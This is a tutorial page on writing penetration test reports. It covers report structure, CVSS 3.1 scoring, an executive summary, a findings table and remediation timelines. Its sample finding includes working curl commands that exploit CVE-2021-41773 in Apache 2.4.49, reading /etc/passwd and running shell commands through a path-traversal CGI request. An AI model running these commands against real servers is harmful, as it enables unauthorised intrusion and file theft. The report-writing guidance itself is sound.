Advanced Pentest & Offensive
Pentest report — structure, CVSS, reproduction, remediation, executive summary
The report is the final deliverable of a pentest. A technically flawless engagement loses value if the report is vague. The goal: allow any engineer to reproduce and fix the vulnerability without asking a single question.
Report structure
1. Cover page and metadata
- Client name, date, document version
- Pentester(s), contracting company
- Classification: CONFIDENTIAL
2. Executive summary
- 1 page, business language, no technical jargon
- Overall risk (Critical / High / Medium / Low)
- 3-5 key takeaways
3. Scope and methodology
- IPs, domains, systems tested
- Time window, test type (black/grey/white box)
- Tools used
4. Vulnerability summary (table)
- ID, Title, Severity, CVSS, Affected system, Status
5. Vulnerability findings — detailed section (one per finding)
6. Recommendations — consolidated list by priority
7. Appendices
- Raw tool output
- Additional evidence
- GlossaryExecutive summary — example
During the period of June 10–14, 2024, [Company X] conducted a penetration
test against [Client Y]'s web infrastructure, covering 12 systems in the DMZ.
18 vulnerabilities were identified: 3 Critical, 4 High, 7 Medium, and
4 Informational.
The critical vulnerabilities allow an unauthenticated external attacker to
gain full administrative access to the web servers and, from there, access
the customer database (PII). Immediate remediation is recommended before
any new production deployment.CVSS 3.1 scoring
CVSS = Common Vulnerability Scoring System
Scale: 0.0 to 10.0
Ranges:
Critical 9.0 – 10.0
High 7.0 – 8.9
Medium 4.0 – 6.9
Low 0.1 – 3.9
Info 0.0
Vector components:
AV (Attack Vector): N=Network, A=Adjacent, L=Local, P=Physical
AC (Attack Complexity): L=Low, H=High
PR (Privileges Required): N=None, L=Low, H=High
UI (User Interaction): N=None, R=Required
S (Scope): U=Unchanged, C=Changed
C/I/A (Confidentiality/Integrity/Availability): N/L/H
Example:
CVE-2021-41773 (Apache Path Traversal + RCE)
CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H → Score: 9.8 (Critical)Vulnerability section — template
ID: VULN-001
Title: Remote Code Execution in Apache 2.4.49 (CVE-2021-41773)
Severity: Critical
CVSS Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
System: webserver01.example.com (192.168.1.50)
DESCRIPTION
Apache HTTP Server version 2.4.49 contains a path normalization flaw that
allows an unauthenticated attacker to escape the document root (path
traversal) and execute arbitrary CGI scripts.
IMPACT
Full operating system access with Apache process permissions (www-data).
Ability to read sensitive files and execute remote commands.
REPRODUCTION (step-by-step)
1. Identify Apache 2.4.49 server:
curl -I http://192.168.1.50
2. Verify CGI module is enabled:
curl http://192.168.1.50/cgi-bin/test.cgi
3. Exploit path traversal:
curl "http://192.168.1.50/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
4. Execute remote command:
curl -d "echo Content-Type: text/plain; echo; id" \
"http://192.168.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
EVIDENCE
Screenshot: [attachment01_rce_apache.png]
Obtained output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
REMEDIATION
Immediate:
Upgrade to Apache 2.4.51 or later.
If upgrade is not possible, disable the CGI module.
Additional:
Deploy a WAF with path traversal rules.
Remove unnecessary modules (mod_cgi, mod_cgid).
Run Apache under a dedicated user with chroot.
REFERENCES
CVE-2021-41773
https://httpd.apache.org/security/vulnerabilities_24.htmlVulnerability table — example
| ID | Title | Severity | CVSS | System |
|----------|--------------------------------|----------|------|-----------------|
| VULN-001 | RCE Apache 2.4.49 | Critical | 9.8 | webserver01 |
| VULN-002 | SQL Injection on /api/search | Critical | 9.1 | api.example.com |
| VULN-003 | Default FTP credentials | High | 7.5 | ftp.example.com |
| VULN-004 | SNMP community "public" | Medium | 5.3 | router01 |
| VULN-005 | Missing X-Frame-Options header | Low | 3.1 | all systems |Recommendations — priority and timeline
Priority (remediate within 24h):
1. Upgrade Apache to 2.4.51+
2. Fix SQL Injection on /api/search endpoint (sanitize inputs, use prepared statements)
Short term (within 7 days):
3. Change default FTP credentials
4. Disable SNMP v1/v2 or restrict community string
Medium term (within 30 days):
5. Implement HTTP security headers across all services
6. Review password policy and enable MFARetest
After remediation, the client requests a retest to validate the fixes.
Retest report includes:
- Retest date
- Which vulnerabilities were fixed (confirmed)
- Which remain open (with new evidence)
- New vulnerabilities introduced during the fix (rare but happens)A well-written report justifies the investment in the pentest and guides the technical team to full remediation.